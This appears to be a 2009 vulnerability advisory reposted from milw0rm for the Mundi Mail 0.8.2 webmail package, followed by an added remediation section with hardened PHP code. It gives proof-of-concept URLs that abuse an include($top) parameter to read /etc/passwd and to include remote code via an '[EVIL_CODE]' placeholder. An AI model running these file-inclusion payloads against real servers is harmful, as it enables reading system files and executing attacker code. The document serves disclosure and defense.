- Code:
----------------------------------------------------------------------------------------------------------
Name : Mundi Mail
Site : http://sourceforge.net/projects/mundimail/
Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732
----------------------------------------------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
----------------------------------------------------------------------------------------------------------
Description:
Bug : Local/Remote File Inclusion
template/simpledefault/admin/_masterlayout.php:10: include($top);
If allow_url_fopen=on --> RFI;
If magic_quotes_gpc=off --> LFI;
----------------------------------------------------------------------------------------------------------
P0c:
LFI: http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd
RFI: http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE]
Note: requires register_globals=on;
----------------------------------------------------------------------------------------------------------
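The root cause above is a request-controlled value reaching include(). The following is an added example (not Mundi Mail's code) that shows the vulnerable pattern beside a hardened one: an allow-list of template keys resolved under a fixed directory, with $_GET read explicitly so nothing depends on register_globals. The directory name `parts` and the template file names are assumptions.

```php
<?php
// Added example, not code from Mundi Mail. Contrasts the vulnerable
// include($top) pattern with an allow-listed, directory-pinned include.

// --- Vulnerable pattern (what _masterlayout.php line 10 does) ---
// With register_globals=On, $top is populated straight from the request
// (?top=/etc/passwd or ?top=http://host/file), and include() obeys it.
//
//     include($top);

// --- Hardened pattern ---
// Map short keys to files; the request never supplies a path, only a key.
$allowedTop = [
    'default' => 'top_default.php',   // assumed file name
    'compact' => 'top_compact.php',   // assumed file name
];

function resolveTemplate(array $allowed, string $baseDir, ?string $key): string
{
    $key = $key ?? 'default';
    if (!array_key_exists($key, $allowed)) {
        throw new InvalidArgumentException('unknown template key');
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$key]);
    // realpath() canonicalises symlinks and "..", so a prefix check on the
    // result guarantees the file lives under $baseDir even if the allow-list
    // table is edited carelessly later.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template path outside template directory');
    }
    return $path;
}

// $_GET is read explicitly; register_globals is irrelevant to this code.
$top = resolveTemplate($allowedTop, __DIR__ . '/parts', $_GET['top'] ?? null);
include $top;
```

As a second layer, PHP 5.2 and later gate remote includes behind the separate allow_url_include directive (default Off), so keeping it Off, along with register_globals=Off, blocks the RFI half even where application code is not fixed.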
# milw0rm.com [2009-06-15]
Mundi Mail 0.8.2 (top) Remote File Inclusion Vulnerability
Foxi- Admin